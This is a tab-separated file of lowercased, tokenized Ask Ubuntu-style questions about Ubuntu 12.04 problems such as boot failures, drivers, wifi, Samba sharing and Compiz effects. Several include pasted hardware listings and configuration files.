130419	how can i install ubuntu 12.04 on external hdd ?	i used to install ubuntu 11.10 on my external hdd , it was working well , but after i installed 12.04 on my external hdd , it ca n't boot any more !
130421	how to modify the default position of desktop icons	is it possible to modify the default desktop icons position so that icons move a little bit to right . if yes , how ? as far as i know , there is no tweak for that in nautilus . when i click `` organize desktop by name '' , the icons get aligned to the left of desktop : that 's fine , but they 're too close to the launcher when it 's in auto hide mode . so when launcher is revealed , it comes over icons . reproduce : download some files from your browser or copy files/folders from a folder to the desktop , then these latter will be placed just like the screenshot . their position is fine when the launcher is hidden , but when revealed , it hides a part of the icons . there is no problem when launcher auto-hide mode is disabled . thanks in advance .
130424	text intermittently is warped , garbled in 12.04 lts	after upgrading to 12.04 lts , text on screen ( both in unity and gnome-shell 3.4 ) becomes garbled , particularly in window title bars and in fields . this does not apply to all text on screen , just text that is being actively edited , or window titles that have changed in any way . lspci output 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) 00:02.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port b ) 00:04.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port d ) 00:05.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port e ) 00:06.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port f ) 00:07.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port g ) 00:09.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port h ) 00:0a.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( external gfx1 port a ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:16.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cypress xt [ radeon hd 5870 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati cypress hdmi audio [ radeon hd 5800 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 03:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 04:00.0 sata controller : jmicron technology corp. jmb362 sata controller ( rev 10 ) 05:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 06:00.0 network controller : atheros communications inc. ar5418 wireless network adapter [ ar5008e 802.11 ( a ) bgn ] ( pci-express ) ( rev 01 ) 07:00.0 sata controller : jmicron technology corp. jmb362 sata controller ( rev 10 ) 08:06.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) graphics card : amd/ati radeon hd5870
130425	updated 12.04 rc to final , does not boot up	i updated my 12.04 rc ( 64-bit ) to kernel 3.2.0-24 and now it does not boot the gui from grub . i can still launch the 3.2.0-20 and the new kernel via recovery mode . when i try to launch it straight from grub , i get just the blank screen .
130427	is there a good alternative of 'textaloud ' text to voice software ?	i 'm looking for an alternative under ubuntu for a software that i used to have long time ago under windows . its called textaluod . it has natural voices that you can use . so far , i tried espeak through terminal , but is too robotic , so i would like to know which alternatives are available for our dear ubuntu and how natural the voices are ?
130430	where can i get the hash for 12.04 iso ?	i 've downloaded the 12.04 lts iso file but i ca n't locate the hash file anywhere .
130434	what terminal command would i use to launch a java executable ?	i know i can just double click it and it will run , but i want something i do n't need my desktop for , and can put it in the sidebar . i have a command , but creating a launcher is n't working . thanks , jordan
130435	0a5c:2100 broadcom corp. bluetooth 2.0+edr dongle not working	i have a broadcom bcm2046 , it appears as connected in the bluetooth widget over the panel , and the hcitools drops me data , but it does n't work at all , i 've tried to connect from another device and it 's inexistent and viceversa from pc to the device hcitool dev and lsusb hci0 : type : br/edr bus : usb bd address : 89:21:09:79 : b5:1b acl mtu : 1017:8 sco mtu : 64:0 up running pscan iscan rx bytes:779 acl:0 sco:0 events:27 errors:0 tx bytes:376 acl:0 sco:0 commands:27 errors:0 bus 001 device 007 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 008 : id 0a5c:2100 broadcom corp. bluetooth 2.0+edr dongle
130441	sound coming from both headphones and speakers on lenovo g460	i 've installed ubuntu 10.04 yesterday on lenovo g460 . i 'm unable to fix this problem after lot of tries in changing model in /etc/modprobe.d/alsa-base.conf to thinkpad/auto/lenovo and many things . can anyone please help me out with this ?
130443	how to run compiz on unity 2d , ubuntu 12.04	when i try to run compiz on unity 2d i ca n't use de dash , and all my workspaces reduces to one single workspace . i want to know how to enable compiz effects on unity 2d without thouse problems . thanks for any help .
130447	i want to uninstall ubuntu but i do n't have win 7 cd to fix mbr , work around ?	i installed ubuntu 11.10 but it does n't work properly , when i choose ubuntu after i turn my pc on it just shows me a purple screen and i can never enter ubuntu . i want to delete it and instead install the new 12.04 but every tutorial for deleting a ubuntu dual boot says i 'll need a win 7 cd/dvd to fix the mbr . i do n't have a windows 7 dvd how can i get ubuntu uninstalled and then fix the mbr ? do i really have to try and get a windows 7 dvd ? does anyone know where i can get such a thing ? hoping there 's a work around that does n't require a windows 7 dvd . thank you in advance . thank you in advance !
130452	how do i add a dns server via resolv.conf ?	is /etc/resolv.conf useless in ubuntu 12.04 lts ( precise pangolin ) ? i see that the dns server information is stored in networkmanager now . the nmcli command line tool can list that for you . if i want to add one more dns server , will adding it to /etc/resolv.conf by using the resolvconf package help ?
130461	how do i solve emacs launcher icon failures ?	i 've just installed emacs 24 on 12.04 following the instructions here : http : //www.mikeyboldt.com/2011/11/30 ... -24-in-ubuntu/ and though it installs and i can run it from the terminal , i ca n't get an icon for the app to work in the launcher . i.e . after the first launch , an icon does appear ( and i was able to `` lock '' it in the launcher ) , but clicking on it does n't switch me to emacs , nor does an emacs icon show up when switching between applications with alt-tab . also , after closing down the app , clicking on the icon that was put in the launchbar , does n't actually launch emacs . where do i find error logs to diagnose this kind of problem ? anybody had something similar happen ?
130473	could anyone provide a step by step for getting juniper netconnect and citrix ?	it 's really dizzying . i seem to have java installed ( using the script from https : //github.com/flexiondotorg/oab-java6 ) however when i connect i see the java `` launching netconnect , this may take several minutes . '' this finishes but netconnect does n't actually seem to be running . i 've managed to get this working with previous versions of ubuntu , so i think i know what should happen .
130474	how do i turn off click-button sounds in kde in ubuntu 12.04 lts ?	when i click on buttons in chrome or various other buttons in kde on ubuntu 12.04 precise lts blahblahblah , a sound is made . i ca n't seem to find a way to turn off these click noises . i really want to turn them off . i like my silence .
130477	dell upgrade to 13.04 & 13.10 no wifi , graphic card driver and bluetooth problem ?	( dell inspiron m5040 upgrade to 12.04 lts from 11.10 wifi wont work and has two bluetooth icons ? ) old title of post ! no wifi/bluetooth problem . `` both fixed '' , see below comments for bluetooth fix and see bottom answer for wifi fix . my online upgrade of 13.04 , was installed to my laptop the dell inspiron m5040 , when it was done i found that my wifi did not even get picked up anymore and i now have two bluetooth icons at the top ? ? so what i have been doing for now is at the boot screen . i hit the use previous linux version , this works fine but also has the two bluetooth at the top . is very thankful for any answers for this fix , thank you . ok bluetooth problem solved by â fossfreedom answer by deleting the other bluetooth program running in software center . now the other problem is wifi : just have to restart system as it works in previous linux version boot opt , but on the first boot screen opt run ubuntu it will not pick up wifi drivers . broadcom 802.11 linux sta wireless driverfor use with broadcom 's bcm4311- , bcm4312- , bcm4313- , bcm4321- , bcm4322- , bcm43224- , and bcm43225- , bcm43227- and bcm43228-basedhardware . and 3d-accelerated proprietary graphics driver for ati cards . this driver is required to fully utilise the 3d potential of some ati graphics cards , as well as provide 2d acceleration of newer cards . will not instill is there anyway for me to make a copy of the drivers via usb hdd and then put them on new upgraded version .
130478	mouse cursor disappeared after upgraded from 11.10 to 12.04	i was running ubuntu 11.10 , and everything was fine . i decides to upgraded to 12.04 . once the upgrade was done , and i rebooted my machine , my mouse cursor is no where to be found . what could be the issue ?
130480	how do i make a window bigger than my screen ?	i want to resize my web browser to be a higher resolution than my screen . i remember being able to do this in windows 95 by setting the desktop resolution higher than the monitor resolution . how can i do it in ubuntu ?
130482	how do i specify file search parameters ?	how do i specify search parameters other than file name ? i want to , for example , retrieve a list of jpegs on my usb drive that are larger than 1 mb . i am interested in gui solutions only â something i would feel comfortable recommending to a novice user who has come to me for help with ubuntu .
130488	micromax mmx 310g data card is not being recognized as a modem	i am using ubuntu 12.04 . when i plug my usb mobile broadband modem , it is detected as a storage disk . it does not switch its mode to modem . the modem is micromax mmx310g 3g .
130494	editing pommed.conf does n't seem to have an effect	i am on a macbook pro 5,5 running 12.04 lts , pommed v1.39 , and gnome shell 3.4 . on macs you should install the pommed package to make full use of the media keys on mac keyboards : brightness for display , keyboard , eject cd , play music . editing /etc/pommed.conf seems to have no effect on my keyboard backlight settings on startup . i have edited it to have the keyboard backlight to be off by default , but it comes on every time i log in or restart . all settings respond fine to keyboard presses , though . below is the contents of my /etc/pommed.conf : # # configuration file for pommed # # general configuration general { # fnmode : functions keys first ( no need to use fn ) or last # value is either 1 or 2 , effect is hardware-dependent fnmode = 1 } # sysfs backlight control # nvidia machines , will fall back to nv8600gmt if not supported by the kernel lcd_sysfs { # the sysfs backlight control is a generic interface provided # by the linux kernel for backlight control on most graphic cards . # the brightness range can differ depending on the hardware . # initial backlight level [ 12 ] ( 0 - 15 , -1 to disable ) init = -1 # step value ( 1 - 2 ) step = 1 # backlight level when on battery [ 6 ] ( 1 - 15 , 0 to disable ) on_batt = 6 } # ati x1600 backlight control ( macbook pro v1 & v2 ) lcd_x1600 { # initial backlight level [ 200 ] ( 0 - 255 , -1 to disable ) init = -1 # step value ( 1 - 127 ) step = 10 # backlight level when on battery [ 80 ] ( 1 - 255 , 0 to disable ) on_batt = 80 } # intel 945gm , 965gm backlight control ( macbook v1-v4 , macbook air v1 ) lcd_gma950 { # initial backlight level [ 0x6f ] ( 0x1f - 0x94 usually , -1 to disable ) init = -1 # step value ( 0x01 - 0x20 ) step = 0x0f # backlight level when on battery [ 0x40 ] ( 0x1f - 0x94 usually , 0 to disable ) on_batt = 0x40 } # nvidia geforce 8600m gt/9400m/9600m gt backlight control # ( macbook pro v3-v5 , macbook v5 , macbook v2 ) lcd_nv8600mgt { # initial backlight level [ 12 ] ( 0 - 15 , -1 to disable ) init = -1 # step value ( 1 - 2 ) step = 1 # backlight level when on battery [ 6 ] ( 1 - 15 , 0 to disable ) on_batt = 6 } # audio support audio { # disable audio support entirely disabled = no # use amixer or alsamixer/alsamixergui to determine the sound card # and the mixer elements to use here . # sound card to use card = `` default '' # initial volume [ 80 ] ( 0 - 100 % , -1 to disable ) init = -1 # step value ( 1 - 50 % ) step = 5 # beep on volume change beep = no # mixer element for volume adjustment volume = `` pcm '' # mixer element for muting the speakers speakers = `` front '' # mixer element for muting the headphones headphones = `` headphone '' } # keyboard backlight control kbd { # default value for automatic backlight ( 0 - 255 ) default = 0 # step value ( 1 - 127 ) step = 10 # ambient light thresholds for automatic backlight ( 0 - 255 ) on_threshold = 20 off_threshold = 40 # enable/disable automatic backlight auto = no # idle timer - fades keyboard backlight automatically ( timeout in seconds , -1 to disable ) idle_timer = 60 # idle level - level to fade keyboard to after idle_timer seconds . defaults to switching off . # idle_level = 20 } # cd/dvd drive ejection eject { # enable/disable eject key enabled = yes # cd/dvd device device = `` /dev/dvd '' } # beeper beep { # enable/disable beeper # automatically disabled if audio support disabled above enabled = no # wav file to use ( from pommed : goutte.wav or click.wav in /usr/share/pommed ) beepfile = `` /usr/share/pommed/goutte.wav '' } # apple remote - deprecated # note : the appleir driver is required for this to work ; this driver has been # obsoleted with linux 2.6.22 , so unless you are running a kernel < 2.6.22 or # use the appleir driver on a newer kernel , this wo n't work . # you should use lirc instead . appleir { # enable/disable the appleir support enabled = no }
130496	how can i see connection information like kde does ?	is there a way i can see download/upload speeds , downloaded/uploaded size , etc . information as kde network manager shows ? i am using 12.04 , with unity and i do n't want to install any other software that needs to be opened from dash . i want to see that with the network-manager conection information only .
130497	how to install gerix on ubuntu 12.04 using backtrack repositories ?	i got instructions from here , and i found several sites with similar instructions but somethig is wrong with the repositories on 12.04 . this should work for 11.10 and previous versions . any ideas how to install backtrack repos and some back track apps on 12.04 ? i read about downloading the .deb package for gerix and manually making the same folder structure that gerix uses on backtrack , then manually run the python script , but this way did n't work for me either . how can i get gerix installed and working on my ubuntu 12.04 system ?
130499	how do i fix slow wireless on intel wireless cards ?	after hours of searching the internet for a solution for extremely slow wifi connection on ubuntu 11.10 & 12.04 on intel wireless , how can i fix this ? thanks amc for your nice editing of my post . actually , i do not know what is the reason of the problem and what the solution is for : ) : ) the reason why i put this post is that it is extremely hard to find a solution for 12.04 and i hope any one can see this post to save time . for 11.10 , it is easy because the solution is easily founded ( reference no . 1 in my post above ) . but for 12.04 , i did a trick to find the solution . you want to know what it is ? well , i discovered that the file responsible for the solution is changed in the new version of ubuntu ( 12.04 ) . i searched for it and found it . then i replaced the new name by the old one . then it worked . i put the post , that i founded the solution inside , in the references ( no . 2 ) . mr. james , and mr. takkat , thank you all for your reply . anyway , it is not duplication because the solution for 12.04 is the important one that you really suffer if you try to find it in the internet !
130500	windows 7 ca n't access ubuntu computer on network	my network currently has 3 windows 7 computers on it and one ubuntu 12.04 . when clicking on `` network '' in windows explorer on any of the three windows computers , you can see all the other computers , including the ubuntu one , and access all three windows computers . however , when i click on the ubuntu one , it says `` windows can not access \ubuntu . you do not have permission to access \ubuntu . contact your network administrator ... '' my ultimate goal is for anyone on the network , no password required , to be able to access the drives i 'm trying to share , and read/write to them ( security risk , i know , but i 'll chance it ) . but at this point , i 'll settle for just being able to access it , and i have no clue why i ca n't . i know i should post the contents of my samba.conf and my fstab , since i 'm trying to share ntfs drives , but i ca n't even figure out how to post them on here . it 's really not a good day for me , computer-wise . any help greatly appreciated .
130502	in nautilus i have two identical entries in my devices list , why ?	i am running ubuntu 12.04 and have two hard drives , one mounts as home , the other as data . strange thing is that i have the data drive showing up twice in nautilus on the devices list . if i click the second one , i get the message : unable to mount data mount : /dev/sda1 already mounted or /media/data busy mount : according to mtab , /dev/sda1 is already mounted on /media/data this is my fstab file contents : uuid=c0ebf008-2a87-418a-9a74-736931769038 / ext4 defaults 0 1 uuid=c346d075-e2ca-4cb2-b387-e2088ad478a5 swap swap sw 0 0 uuid=ee7513f0-0875-4451-a346-56368896d12b /media/data ext4 users 0 0 while this is not a huge issue , it 's annoying , so any suggestions would be welcome ... thanks , bill edit ... the blkid gave me : /dev/sda1 : label= '' data '' uuid= '' ee7513f0-0875-4451-a346-56368896d12b '' type= '' ext4 '' /dev/sdb1 : uuid= '' c0ebf008-2a87-418a-9a74-736931769038 '' type= '' ext4 '' /dev/sdb5 : uuid= '' c346d075-e2ca-4cb2-b387-e2088ad478a5 '' type= '' swap '' /dev/sr1 : label= '' globe broadband '' type= '' iso9660 '' the df -ht gave me : filesystem type size used avail use % mounted on /dev/sdb1 ext4 246g 19g 216g 8 % / udev devtmpfs 2.2g 8.2k 2.2g 1 % /dev tmpfs tmpfs 846m 881k 845m 1 % /run none tmpfs 5.3m 4.1k 5.3m 1 % /run/lock none tmpfs 2.2g 918k 2.2g 1 % /run/shm /dev/sda1 ext4 1.0t 363g 587g 39 % /media/data i took a look at the gparted info and everything look normal . file system ext4 size is correct no flags set path and mount is all like regular hopefully this tells you all something , because i am baffled ; - ) thanks , bill
130505	how can i empty amarok 's media collection ?	much to my dismay , amarok defaulted to adding all audio files in my entire home folder to its local collection â without my permission . the local collection is now full of uncurated garbage . how can i empty it ?
130506	the message `` software index is broken '' appears when i install the flash plugin . what does this mean ?	i am fairly a novice ; i ca n't even get it to upgrade to the 12.04 version from 10.1 . i get this message every time when trying to install the flash plugin : `` software index is broken '' this is a major failure ... .and a bunch more stuff . ideas ?
130514	ubuntu 12.04 wallpaper problem when using two monitors	i am using two monitors , the main resolution is 1920x1080 and the secondary is 1440x900 . everything seems to work fine ( with default drivers , fglrx crashes bad ) , besides windows opening in the wrong monitor ( even when the main is set correctly ) , but now what i am trying to fix is the wallpaper problem , here 's an image to explain it easier : click on the image to see a full resolution version it also happens with gradients . the secondary monitor is physically aligned like in the image , lower than the other , the wallpaper on the main screen seems to keep the size of the lower resolution , and then it start at the correct resolution the last part at right . any way to fix this ? i am using ubuntu 12.04 with gnome-shell 3.4.1 , the vga is a radeon hd 6950 update i went to gnome-tweak-tool and disabled `` have file manager handle the desktop '' , now it looks ok on both monitors , but i ca n't have icons on my desktop , so i am still interested in solving it . update2 disabling `` have file manager handle the desktop '' , in gnome-tweak-tool and then re-enabling it seems to work , but has to be done every time you turn on the pc .
130516	how do i install drivers for a lexmark x6675 printer ?	i have a problem installing lexmark x6675 driver on precise and have problem . the package has a blank line in description field which was n't a problem all the way up to oneiric but it is a problem on precise . extracting file : printdriver.te extracting file : lexmark-08z-series-driver-1.0-1.i386.deb extracting file : launcher.c extracting file : launcher extracting file : lsbrowser extracting file : lsusbdevice using dpkg installation ============================= execute : dpkg -i -- force-architecture lexmark-08z-series-driver-1.0-1.i386.deb > /tmp/selfgz11978/pkg/files/dpkg_msgs dpkg : error processing lexmark-08z-series-driver-1.0-1.i386.deb ( -- install ) : parsing file '/var/lib/dpkg/tmp.ci/control ' near line 9 package 'lexmark-08z-series-driver ' : blank line in value of field 'description' errors were encountered while processing : lexmark-08z-series-driver-1.0-1.i386.deb ============================= ============================= execute : rm lexmark-08z-series-driver-1.0-1.i386.deb ============================= ***** error report ***** is there any way to work around it ?
130517	live usb always freezes	i have tried unetbootin , lili , and universal usb installer , but they all freeze on the syslinux `` intro '' screen . i am trying 12.04 x64 . how do i get it to work ?
130520	what is the most `` ubuntu '' way of preventing certain users from shutting down , suspending etc ?	on a traditional unix system , non-root users can not do this . what is it that gives users this ability in modern desktop environments and how would i go about disabling this on a per-user or per-group basis ? i 've seen a great method to prevent anybody from shutting down/suspending , but ideally what i 'm looking for is to prevent certain users ( such as , by adding/removing them from a certain usergroup ) from being able to execute a shutdown , restart , suspend .
130522	windows 7 and ubuntu 12.04 ca n't connect anymore ?	after formatting and installing ubuntu 12.04 , windows 7 ca n't connect to ubuntu and ubuntu ca n't connect to windows 7 . this worked perfectly under fine under ubuntu 11.10 and i have n't done any special tweaks to the smb.conf file on either system . i 've included my smb.conf file , does anyone know what 's wrong ? # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom
130528	how do i import email , settings etc . from 10.10 for thunderbird in 12.04 ?	i just recently installed 12.04 on my computer , and when i try to import email and settings from another drive , the import wizard asks , `` import from '' but there 's no dialog or browse facility to tell it where to import from . am i missing something ? how do i import when there 's nowhere to tell it where to import from ? i 'm using thunderbird on both drives , the old os is 10.10 .
130531	how do i add a new root folder to specific drive ?	i have /var on a separate drive and now i want to add /backup to that same drive . how would i do that ? when i installed ubuntu , i put / on an 80 gb drive and had a 250 gb drive use /var . i want my backups to reside on the 250 gb drive since they can take up quite a bit of space .
130532	sudo apt-get install ubuntu-desktop , error : unable to locate package	when i try sudo apt-get install ubuntu-desktop i get the error message : unable to locate package ubuntu-desktop . where do i obtain the package ? or what am i doing wrong ?
130553	12.04 - are there any drivers for integrated webcam on dell inspiron n7010 ?	i 'm very new to ubuntu . are there any third-party drivers for the integrated webcam on dell inspiron n7010 , a work around , or canonical driver out there yet ? i 'm using ubuntu 12.04 . it worked fine for me in 11.10 .
130555	how to enable compiz effects ?	i have a problem with compiz . i installed compiz setting manager on ubuntu 12.04 , also installed compiz main and extra fusion plug-ins . but i ca n't enable 3d windows and cube reflection effects . the check boxes of these plug-ins does n't work .
